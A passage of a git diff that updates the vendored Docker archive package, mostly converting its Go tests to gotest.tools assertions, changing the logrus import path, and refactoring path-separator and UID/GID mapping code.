os.RemoveAll(path.Join(root, "dir1")) + assert.NilError(t, err) // Remove a symlink - if err := os.RemoveAll(path.Join(root, "symlink1")); err != nil { - t.Fatal(err) - } + err = os.RemoveAll(path.Join(root, "symlink1")) + assert.NilError(t, err) // Rewrite a file - if err := ioutil.WriteFile(path.Join(root, "file2"), []byte("fileNN\n"), 0777); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(path.Join(root, "file2"), []byte("fileNN\n"), 0777) + assert.NilError(t, err) // Replace a file - if err := os.RemoveAll(path.Join(root, "file3")); err != nil { - t.Fatal(err) - } - if err := ioutil.WriteFile(path.Join(root, "file3"), []byte("fileMM\n"), 0404); err != nil { - t.Fatal(err) - } + err = os.RemoveAll(path.Join(root, "file3")) + assert.NilError(t, err) + err = ioutil.WriteFile(path.Join(root, "file3"), []byte("fileMM\n"), 0404) + assert.NilError(t, err) // Touch file - if err := system.Chtimes(path.Join(root, "file4"), time.Now().Add(time.Second), time.Now().Add(time.Second)); err != nil { - t.Fatal(err) - } + err = system.Chtimes(path.Join(root, "file4"), time.Now().Add(time.Second), time.Now().Add(time.Second)) + assert.NilError(t, err) // Replace file with dir - if err := os.RemoveAll(path.Join(root, "file5")); err != nil { - t.Fatal(err) - } - if err := os.MkdirAll(path.Join(root, "file5"), 0666); err != nil { - t.Fatal(err) - } + err = os.RemoveAll(path.Join(root, "file5")) + assert.NilError(t, err) + err = os.MkdirAll(path.Join(root, "file5"), 0666) + assert.NilError(t, err) // Create new file - if err := ioutil.WriteFile(path.Join(root, "filenew"), []byte("filenew\n"), 0777); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(path.Join(root, "filenew"), []byte("filenew\n"), 0777) + assert.NilError(t, err) // Create new dir - if err := os.MkdirAll(path.Join(root, "dirnew"), 0766); err != nil { - t.Fatal(err) - } + err = os.MkdirAll(path.Join(root, "dirnew"), 0766) + assert.NilError(t, err) // Create a new symlink - if err := os.Symlink("targetnew", path.Join(root, "symlinknew")); err != nil { - t.Fatal(err) - } + err = os.Symlink("targetnew", path.Join(root, "symlinknew")) + assert.NilError(t, err) // Change a symlink - if err := os.RemoveAll(path.Join(root, "symlink2")); err != nil { - t.Fatal(err) - } - if err := os.Symlink("target2change", path.Join(root, "symlink2")); err != nil { - t.Fatal(err) - } + err = os.RemoveAll(path.Join(root, "symlink2")) + assert.NilError(t, err) + + err = os.Symlink("target2change", path.Join(root, "symlink2")) + assert.NilError(t, err) // Replace dir with file - if err := os.RemoveAll(path.Join(root, "dir2")); err != nil { - t.Fatal(err) - } - if err := ioutil.WriteFile(path.Join(root, "dir2"), []byte("dir2\n"), 0777); err != nil { - t.Fatal(err) - } + err = os.RemoveAll(path.Join(root, "dir2")) + assert.NilError(t, err) + err = ioutil.WriteFile(path.Join(root, "dir2"), []byte("dir2\n"), 0777) + assert.NilError(t, err) // Touch dir - if err := system.Chtimes(path.Join(root, "dir3"), time.Now().Add(time.Second), time.Now().Add(time.Second)); err != nil { - t.Fatal(err) - } + err = system.Chtimes(path.Join(root, "dir3"), time.Now().Add(time.Second), time.Now().Add(time.Second)) + assert.NilError(t, err) } func TestChangesDirsMutated(t *testing.T) { // TODO Windows. There may be a way of running this, but turning off for now // as createSampleDir uses symlinks. - // TODO Should work for Solaris - if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { - t.Skip("symlinks on Windows; gcp failures on Solaris") + if runtime.GOOS == "windows" { + t.Skip("symlinks on Windows") } src, err := ioutil.TempDir("", "docker-changes-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) createSampleDir(t, src) dst := src + "-copy" - if err := copyDir(src, dst); err != nil { - t.Fatal(err) - } + err = copyDir(src, dst) + assert.NilError(t, err) defer os.RemoveAll(src) defer os.RemoveAll(dst) mutateSampleDir(t, dst) changes, err := ChangesDirs(dst, src) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) sort.Sort(changesByPath(changes)) @@ -431,46 +383,33 @@ func TestChangesDirsMutated(t *testing.T) { func TestApplyLayer(t *testing.T) { // TODO Windows. There may be a way of running this, but turning off for now // as createSampleDir uses symlinks. - // TODO Should work for Solaris - if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { - t.Skip("symlinks on Windows; gcp failures on Solaris") + if runtime.GOOS == "windows" { + t.Skip("symlinks on Windows") } src, err := ioutil.TempDir("", "docker-changes-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) createSampleDir(t, src) defer os.RemoveAll(src) dst := src + "-copy" - if err := copyDir(src, dst); err != nil { - t.Fatal(err) - } + err = copyDir(src, dst) + assert.NilError(t, err) mutateSampleDir(t, dst) defer os.RemoveAll(dst) changes, err := ChangesDirs(dst, src) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) layer, err := ExportChanges(dst, changes, nil, nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) layerCopy, err := NewTempArchive(layer, "") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - if _, err := ApplyLayer(src, layerCopy); err != nil { - t.Fatal(err) - } + _, err = ApplyLayer(src, layerCopy) + assert.NilError(t, err) changes2, err := ChangesDirs(src, dst) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) if len(changes2) != 0 { t.Fatalf("Unexpected differences after reapplying mutation: %v", changes2) @@ -484,26 +423,18 @@ func TestChangesSizeWithHardlinks(t *testing.T) { t.Skip("hardlinks on Windows") } srcDir, err := ioutil.TempDir("", "docker-test-srcDir") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(srcDir) destDir, err := ioutil.TempDir("", "docker-test-destDir") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(destDir) creationSize, err := prepareUntarSourceDirectory(100, destDir, true) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) changes, err := ChangesDirs(destDir, srcDir) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) got := ChangesSize(destDir, changes) if got != int64(creationSize) { @@ -530,15 +461,15 @@ func TestChangesSizeWithOnlyDeleteChanges(t *testing.T) { func TestChangesSize(t *testing.T) { parentPath, err := ioutil.TempDir("", "docker-changes-test") + assert.NilError(t, err) defer os.RemoveAll(parentPath) addition := path.Join(parentPath, "addition") - if err := ioutil.WriteFile(addition, []byte{0x01, 0x01, 0x01}, 0744); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(addition, []byte{0x01, 0x01, 0x01}, 0744) + assert.NilError(t, err) modification := path.Join(parentPath, "modification") - if err = ioutil.WriteFile(modification, []byte{0x01, 0x01, 0x01}, 0744); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(modification, []byte{0x01, 0x01, 0x01}, 0744) + assert.NilError(t, err) + changes := []Change{ {Path: "addition", Kind: ChangeAdd}, {Path: "modification", Kind: ChangeModify}, @@ -550,6 +481,7 @@ func TestChangesSize(t *testing.T) { } func checkChanges(expectedChanges, changes []Change, t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") sort.Sort(changesByPath(expectedChanges)) sort.Sort(changesByPath(changes)) for i := 0; i < max(len(changes), len(expectedChanges)); i++ { diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_unix.go b/vendor/github.com/docker/docker/pkg/archive/changes_unix.go index 3778b732cf..c06a209d8e 100644 --- a/vendor/github.com/docker/docker/pkg/archive/changes_unix.go +++ b/vendor/github.com/docker/docker/pkg/archive/changes_unix.go @@ -1,12 +1,13 @@ // +build !windows -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "os" "syscall" "github.com/docker/docker/pkg/system" + "golang.org/x/sys/unix" ) func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool { @@ -16,7 +17,7 @@ func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool { oldStat.GID() != newStat.GID() || oldStat.Rdev() != newStat.Rdev() || // Don't look at size for dirs, its not a good measure of change - (oldStat.Mode()&syscall.S_IFDIR != syscall.S_IFDIR && + (oldStat.Mode()&unix.S_IFDIR != unix.S_IFDIR && (!sameFsTimeSpec(oldStat.Mtim(), newStat.Mtim()) || (oldStat.Size() != newStat.Size()))) { return true } @@ -24,11 +25,11 @@ func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool { } func (info *FileInfo) isDir() bool { - return info.parent == nil || info.stat.Mode()&syscall.S_IFDIR != 0 + return info.parent == nil || info.stat.Mode()&unix.S_IFDIR != 0 } func getIno(fi os.FileInfo) uint64 { - return uint64(fi.Sys().(*syscall.Stat_t).Ino) + return fi.Sys().(*syscall.Stat_t).Ino } func hasHardlinks(fi os.FileInfo) bool { diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_windows.go b/vendor/github.com/docker/docker/pkg/archive/changes_windows.go index af94243fc4..6555c01368 100644 --- a/vendor/github.com/docker/docker/pkg/archive/changes_windows.go +++ b/vendor/github.com/docker/docker/pkg/archive/changes_windows.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "os" @@ -9,16 +9,16 @@ import ( func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool { // Don't look at size for dirs, its not a good measure of change - if oldStat.ModTime() != newStat.ModTime() || + if oldStat.Mtim() != newStat.Mtim() || oldStat.Mode() != newStat.Mode() || - oldStat.Size() != newStat.Size() && !oldStat.IsDir() { + oldStat.Size() != newStat.Size() && !oldStat.Mode().IsDir() { return true } return false } func (info *FileInfo) isDir() bool { - return info.parent == nil || info.stat.IsDir() + return info.parent == nil || info.stat.Mode().IsDir() } func getIno(fi os.FileInfo) (inode uint64) { diff --git a/vendor/github.com/docker/docker/pkg/archive/copy.go b/vendor/github.com/docker/docker/pkg/archive/copy.go index 0614c67cec..d0f13ca79b 100644 --- a/vendor/github.com/docker/docker/pkg/archive/copy.go +++ b/vendor/github.com/docker/docker/pkg/archive/copy.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" @@ -9,8 +9,8 @@ import ( "path/filepath" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" ) // Errors used or returned by this file. @@ -27,23 +27,23 @@ var ( // path (from before being processed by utility functions from the path or // filepath stdlib packages) ends with a trailing `/.` or `/`. If the cleaned // path already ends in a `.` path segment, then another is not added. If the -// clean path already ends in a path separator, then another is not added. -func PreserveTrailingDotOrSeparator(cleanedPath, originalPath string) string { +// clean path already ends in the separator, then another is not added. +func PreserveTrailingDotOrSeparator(cleanedPath string, originalPath string, sep byte) string { // Ensure paths are in platform semantics - cleanedPath = normalizePath(cleanedPath) - originalPath = normalizePath(originalPath) + cleanedPath = strings.Replace(cleanedPath, "/", string(sep), -1) + originalPath = strings.Replace(originalPath, "/", string(sep), -1) if !specifiesCurrentDir(cleanedPath) && specifiesCurrentDir(originalPath) { - if !hasTrailingPathSeparator(cleanedPath) { + if !hasTrailingPathSeparator(cleanedPath, sep) { // Add a separator if it doesn't already end with one (a cleaned // path would only end in a separator if it is the root). - cleanedPath += string(filepath.Separator) + cleanedPath += string(sep) } cleanedPath += "." } - if !hasTrailingPathSeparator(cleanedPath) && hasTrailingPathSeparator(originalPath) { - cleanedPath += string(filepath.Separator) + if !hasTrailingPathSeparator(cleanedPath, sep) && hasTrailingPathSeparator(originalPath, sep) { + cleanedPath += string(sep) } return cleanedPath @@ -52,14 +52,14 @@ func PreserveTrailingDotOrSeparator(cleanedPath, originalPath string) string { // assertsDirectory returns whether the given path is // asserted to be a directory, i.e., the path ends with // a trailing '/' or `/.`, assuming a path separator of `/`. -func assertsDirectory(path string) bool { - return hasTrailingPathSeparator(path) || specifiesCurrentDir(path) +func assertsDirectory(path string, sep byte) bool { + return hasTrailingPathSeparator(path, sep) || specifiesCurrentDir(path) } // hasTrailingPathSeparator returns whether the given // path ends with the system's path separator character. -func hasTrailingPathSeparator(path string) bool { - return len(path) > 0 && os.IsPathSeparator(path[len(path)-1]) +func hasTrailingPathSeparator(path string, sep byte) bool { + return len(path) > 0 && path[len(path)-1] == sep } // specifiesCurrentDir returns whether the given path specifies @@ -72,10 +72,10 @@ func specifiesCurrentDir(path string) bool { // basename by first cleaning the path but preserves a trailing "." if the // original path specified the current directory. func SplitPathDirEntry(path string) (dir, base string) { - cleanedPath := filepath.Clean(normalizePath(path)) + cleanedPath := filepath.Clean(filepath.FromSlash(path)) if specifiesCurrentDir(path) { - cleanedPath += string(filepath.Separator) + "." + cleanedPath += string(os.PathSeparator) + "." } return filepath.Dir(cleanedPath), filepath.Base(cleanedPath) @@ -106,19 +106,24 @@ func TarResourceRebase(sourcePath, rebaseName string) (content io.ReadCloser, er // Separate the source path between its directory and // the entry in that directory which we are archiving. sourceDir, sourceBase := SplitPathDirEntry(sourcePath) - - filter := []string{sourceBase} + opts := TarResourceRebaseOpts(sourceBase, rebaseName) logrus.Debugf("copying %q from %q", sourceBase, sourceDir) + return TarWithOptions(sourceDir, opts) +} - return TarWithOptions(sourceDir, &TarOptions{ +// TarResourceRebaseOpts does not preform the Tar, but instead just creates the rebase +// parameters to be sent to TarWithOptions (the TarOptions struct) +func TarResourceRebaseOpts(sourceBase string, rebaseName string) *TarOptions { + filter := []string{sourceBase} + return &TarOptions{ Compression: Uncompressed, IncludeFiles: filter, IncludeSourceDir: true, RebaseNames: map[string]string{ sourceBase: rebaseName, }, - }) + } } // CopyInfo holds basic info about the source @@ -218,7 +223,7 @@ func CopyInfoDestinationPath(path string) (info CopyInfo, err error) { // Ensure destination parent dir exists. dstParent, _ := SplitPathDirEntry(path) - parentDirStat, err := os.Lstat(dstParent) + parentDirStat, err := os.Stat(dstParent) if err != nil { return CopyInfo{}, err } @@ -281,7 +286,7 @@ func PrepareArchiveCopy(srcContent io.Reader, srcInfo, dstInfo CopyInfo) (dstDir srcBase = srcInfo.RebaseName } return dstDir, RebaseArchiveEntries(srcContent, srcBase, dstBase), nil - case assertsDirectory(dstInfo.Path): + case assertsDirectory(dstInfo.Path, os.PathSeparator): // The destination does not exist and is asserted to be created as a // directory, but the source content is not a directory. This is an // error condition since you cannot create a directory from a file @@ -332,6 +337,9 @@ func RebaseArchiveEntries(srcContent io.Reader, oldBase, newBase string) io.Read } hdr.Name = strings.Replace(hdr.Name, oldBase, newBase, 1) + if hdr.Typeflag == tar.TypeLink { + hdr.Linkname = strings.Replace(hdr.Linkname, oldBase, newBase, 1) + } if err = rebasedTar.WriteHeader(hdr); err != nil { w.CloseWithError(err) @@ -348,6 +356,9 @@ func RebaseArchiveEntries(srcContent io.Reader, oldBase, newBase string) io.Read return rebased } +// TODO @gupta-ak. These might have to be changed in the future to be +// continuity driver aware as well to support LCOW. + // CopyResource performs an archive copy from the given source path to the // given destination path. The source path MUST exist and the destination // path's parent directory must exist. @@ -362,8 +373,8 @@ func CopyResource(srcPath, dstPath string, followLink bool) error { dstPath = normalizePath(dstPath) // Clean the source and destination paths. - srcPath = PreserveTrailingDotOrSeparator(filepath.Clean(srcPath), srcPath) - dstPath = PreserveTrailingDotOrSeparator(filepath.Clean(dstPath), dstPath) + srcPath = PreserveTrailingDotOrSeparator(filepath.Clean(srcPath), srcPath, os.PathSeparator) + dstPath = PreserveTrailingDotOrSeparator(filepath.Clean(dstPath), dstPath, os.PathSeparator) if srcInfo, err = CopyInfoSourcePath(srcPath, followLink); err != nil { return err @@ -426,7 +437,8 @@ func ResolveHostSourcePath(path string, followLink bool) (resolvedPath, rebaseNa // resolvedDirPath will have been cleaned (no trailing path separators) so // we can manually join it with the base path element. resolvedPath = resolvedDirPath + string(filepath.Separator) + basePath - if hasTrailingPathSeparator(path) && filepath.Base(path) != filepath.Base(resolvedPath) { + if hasTrailingPathSeparator(path, os.PathSeparator) && + filepath.Base(path) != filepath.Base(resolvedPath) { rebaseName = filepath.Base(path) } } @@ -439,11 +451,13 @@ func GetRebaseName(path, resolvedPath string) (string, string) { // linkTarget will have been cleaned (no trailing path separators and dot) so // we can manually join it with them var rebaseName string - if specifiesCurrentDir(path) && !specifiesCurrentDir(resolvedPath) { + if specifiesCurrentDir(path) && + !specifiesCurrentDir(resolvedPath) { resolvedPath += string(filepath.Separator) + "." } - if hasTrailingPathSeparator(path) && !hasTrailingPathSeparator(resolvedPath) { + if hasTrailingPathSeparator(path, os.PathSeparator) && + !hasTrailingPathSeparator(resolvedPath, os.PathSeparator) { resolvedPath += string(filepath.Separator) } diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_unix.go b/vendor/github.com/docker/docker/pkg/archive/copy_unix.go index e305b5e4af..3958364f5b 100644 --- a/vendor/github.com/docker/docker/pkg/archive/copy_unix.go +++ b/vendor/github.com/docker/docker/pkg/archive/copy_unix.go @@ -1,6 +1,6 @@ // +build !windows -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "path/filepath" diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go b/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go index ecbfc172b0..739ad0e3ef 100644 --- a/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go @@ -1,8 +1,8 @@ // +build !windows -// TODO Windows: Some of these tests may be salvagable and portable to Windows. +// TODO Windows: Some of these tests may be salvageable and portable to Windows. -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "bytes" @@ -15,6 +15,8 @@ import ( "path/filepath" "strings" "testing" + + "gotest.tools/assert" ) func removeAllPaths(paths ...string) { @@ -26,13 +28,11 @@ func removeAllPaths(paths ...string) { func getTestTempDirs(t *testing.T) (tmpDirA, tmpDirB string) { var err error - if tmpDirA, err = ioutil.TempDir("", "archive-copy-test"); err != nil { - t.Fatal(err) - } + tmpDirA, err = ioutil.TempDir("", "archive-copy-test") + assert.NilError(t, err) - if tmpDirB, err = ioutil.TempDir("", "archive-copy-test"); err != nil { - t.Fatal(err) - } + tmpDirB, err = ioutil.TempDir("", "archive-copy-test") + assert.NilError(t, err) return } @@ -118,9 +118,8 @@ func logDirContents(t *testing.T, dirPath string) { t.Logf("logging directory contents: %q", dirPath) - if err := filepath.Walk(dirPath, logWalkedPaths); err != nil { - t.Fatal(err) - } + err := filepath.Walk(dirPath, logWalkedPaths) + assert.NilError(t, err) } func testCopyHelper(t *testing.T, srcPath, dstPath string) (err error) { @@ -293,9 +292,8 @@ func TestCopyCaseA(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, srcPath, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, srcPath, dstPath) + assert.NilError(t, err) os.Remove(dstPath) symlinkPath := filepath.Join(tmpDirA, "symlink3") @@ -306,17 +304,15 @@ func TestCopyCaseA(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, linkTarget, dstPath) + assert.NilError(t, err) os.Remove(dstPath) if err = testCopyHelperFSym(t, symlinkPath1, dstPath); err != nil { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, linkTarget, dstPath) + assert.NilError(t, err) } // B. SRC specifies a file and DST (with trailing path separator) doesn't @@ -377,9 +373,8 @@ func TestCopyCaseC(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, srcPath, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, srcPath, dstPath) + assert.NilError(t, err) } // C. Symbol link following version: @@ -415,9 +410,8 @@ func TestCopyCaseCFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, linkTarget, dstPath) + assert.NilError(t, err) } // D. SRC specifies a file and DST exists as a directory. This should place @@ -446,9 +440,8 @@ func TestCopyCaseD(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, srcPath, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, srcPath, dstPath) + assert.NilError(t, err) // Now try again but using a trailing path separator for dstDir. @@ -466,9 +459,8 @@ func TestCopyCaseD(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, srcPath, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, srcPath, dstPath) + assert.NilError(t, err) } // D. Symbol link following version: @@ -499,9 +491,8 @@ func TestCopyCaseDFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, linkTarget, dstPath) + assert.NilError(t, err) // Now try again but using a trailing path separator for dstDir. @@ -519,9 +510,8 @@ func TestCopyCaseDFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, linkTarget, dstPath) + assert.NilError(t, err) } // E. SRC specifies a directory and DST does not exist. This should create a @@ -563,9 +553,8 @@ func TestCopyCaseE(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, dstDir, srcDir); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, dstDir, srcDir) + assert.NilError(t, err) } // E. Symbol link following version: @@ -609,9 +598,8 @@ func TestCopyCaseEFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, dstDir, linkTarget) + assert.NilError(t, err) } // F. SRC specifies a directory and DST exists as a file. This should cause an @@ -669,9 +657,8 @@ func TestCopyCaseG(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, resultDir, srcDir); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, resultDir, srcDir) + assert.NilError(t, err) // Now try again but using a trailing path separator for dstDir. @@ -689,9 +676,8 @@ func TestCopyCaseG(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, resultDir, srcDir); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, resultDir, srcDir) + assert.NilError(t, err) } // G. Symbol link version: @@ -717,9 +703,8 @@ func TestCopyCaseGFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, resultDir, linkTarget); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, resultDir, linkTarget) + assert.NilError(t, err) // Now try again but using a trailing path separator for dstDir. @@ -737,9 +722,8 @@ func TestCopyCaseGFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, resultDir, linkTarget); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, resultDir, linkTarget) + assert.NilError(t, err) } // H. SRC specifies a directory's contents only and DST does not exist. This @@ -899,9 +883,8 @@ func TestCopyCaseJ(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, dstDir, srcDir); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, dstDir, srcDir) + assert.NilError(t, err) // Now try again but using a trailing path separator for dstDir. @@ -919,9 +902,8 @@ func TestCopyCaseJ(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, dstDir, srcDir); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, dstDir, srcDir) + assert.NilError(t, err) } // J. Symbol link following version: @@ -952,9 +934,8 @@ func TestCopyCaseJFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, dstDir, linkTarget) + assert.NilError(t, err) // Now try again but using a trailing path separator for dstDir. @@ -972,7 +953,6 @@ func TestCopyCaseJFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, dstDir, linkTarget) + assert.NilError(t, err) } diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_windows.go b/vendor/github.com/docker/docker/pkg/archive/copy_windows.go index 2b775b45c4..a878d1bac4 100644 --- a/vendor/github.com/docker/docker/pkg/archive/copy_windows.go +++ b/vendor/github.com/docker/docker/pkg/archive/copy_windows.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "path/filepath" diff --git a/vendor/github.com/docker/docker/pkg/archive/diff.go b/vendor/github.com/docker/docker/pkg/archive/diff.go index 9e1a58c499..fae4b9de02 100644 --- a/vendor/github.com/docker/docker/pkg/archive/diff.go +++ b/vendor/github.com/docker/docker/pkg/archive/diff.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" @@ -10,10 +10,10 @@ import ( "runtime" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/pools" "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" ) // UnpackLayer unpack `layer` to a `dest`. The stream `layer` can be @@ -33,17 +33,11 @@ func UnpackLayer(dest string, layer io.Reader, options *TarOptions) (size int64, if options.ExcludePatterns == nil { options.ExcludePatterns = []string{} } - remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps) - if err != nil { - return 0, err - } + idMappings := idtools.NewIDMappingsFromMaps(options.UIDMaps, options.GIDMaps) aufsTempdir := "" aufsHardlinks := make(map[string]*tar.Header) - if options == nil { - options = &TarOptions{} - } // Iterate through the files in the archive. for { hdr, err := tr.Next() @@ -90,7 +84,7 @@ func UnpackLayer(dest string, layer io.Reader, options *TarOptions) (size int64, parentPath := filepath.Join(dest, parent) if _, err := os.Lstat(parentPath); err != nil && os.IsNotExist(err) { - err = system.MkdirAll(parentPath, 0600) + err = system.MkdirAll(parentPath, 0600, "") if err != nil { return 0, err } @@ -198,27 +192,10 @@ func UnpackLayer(dest string, layer io.Reader, options *TarOptions) (size int64, srcData = tmpFile } - // if the options contain a uid & gid maps, convert header uid/gid - // entries using the maps such that lchown sets the proper mapped - // uid/gid after writing the file. We only perform this mapping if - // the file isn't already owned by the remapped root UID or GID, as - // that specific uid/gid has no mapping from container -> host, and - // those files already have the proper ownership for inside the - // container. - if srcHdr.Uid != remappedRootUID { - xUID, err := idtools.ToHost(srcHdr.Uid, options.UIDMaps) - if err != nil { - return 0, err - } - srcHdr.Uid = xUID - } - if srcHdr.Gid != remappedRootGID { - xGID, err := idtools.ToHost(srcHdr.Gid, options.GIDMaps) - if err != nil { - return 0, err - } - srcHdr.Gid = xGID + if err := remapIDs(idMappings, srcHdr); err != nil { + return 0, err } + if err := createTarFile(path, dest, srcHdr, srcData, true, nil, options.InUserNS); err != nil { return 0, err } @@ -270,10 +247,12 @@ func applyLayerHandler(dest string, layer io.Reader, options *TarOptions, decomp defer system.Umask(oldmask) // ignore err, ErrNotSupportedPlatform if decompress { - layer, err = DecompressStream(layer) + decompLayer, err := DecompressStream(layer) if err != nil { return 0, err } + defer decompLayer.Close() + layer = decompLayer } return UnpackLayer(dest, layer, options) } diff --git a/vendor/github.com/docker/docker/pkg/archive/diff_test.go b/vendor/github.com/docker/docker/pkg/archive/diff_test.go index 8167941ac0..19f2555e1a 100644 --- a/vendor/github.com/docker/docker/pkg/archive/diff_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/diff_test.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" diff --git a/vendor/github.com/docker/docker/pkg/archive/example_changes.go b/vendor/github.com/docker/docker/pkg/archive/example_changes.go index cedd46a408..495db809e9 100644 --- a/vendor/github.com/docker/docker/pkg/archive/example_changes.go +++ b/vendor/github.com/docker/docker/pkg/archive/example_changes.go @@ -13,8 +13,8 @@ import ( "os" "path" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/archive" + "github.com/sirupsen/logrus" ) var ( diff --git a/vendor/github.com/docker/docker/pkg/archive/time_linux.go b/vendor/github.com/docker/docker/pkg/archive/time_linux.go index 3448569b1e..797143ee84 100644 --- a/vendor/github.com/docker/docker/pkg/archive/time_linux.go +++ b/vendor/github.com/docker/docker/pkg/archive/time_linux.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "syscall" @@ -9,7 +9,7 @@ func timeToTimespec(time time.Time) (ts syscall.Timespec) { if time.IsZero() { // Return UTIME_OMIT special value ts.Sec = 0 - ts.Nsec = ((1 << 30) - 2) + ts.Nsec = (1 << 30) - 2 return } return syscall.NsecToTimespec(time.UnixNano()) diff --git a/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go b/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go index e85aac0540..f58bf227fd 100644 --- a/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "syscall" diff --git a/vendor/github.com/docker/docker/pkg/archive/utils_test.go b/vendor/github.com/docker/docker/pkg/archive/utils_test.go index 01b9e92d1c..a20f58ddab 100644 --- a/vendor/github.com/docker/docker/pkg/archive/utils_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/utils_test.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( 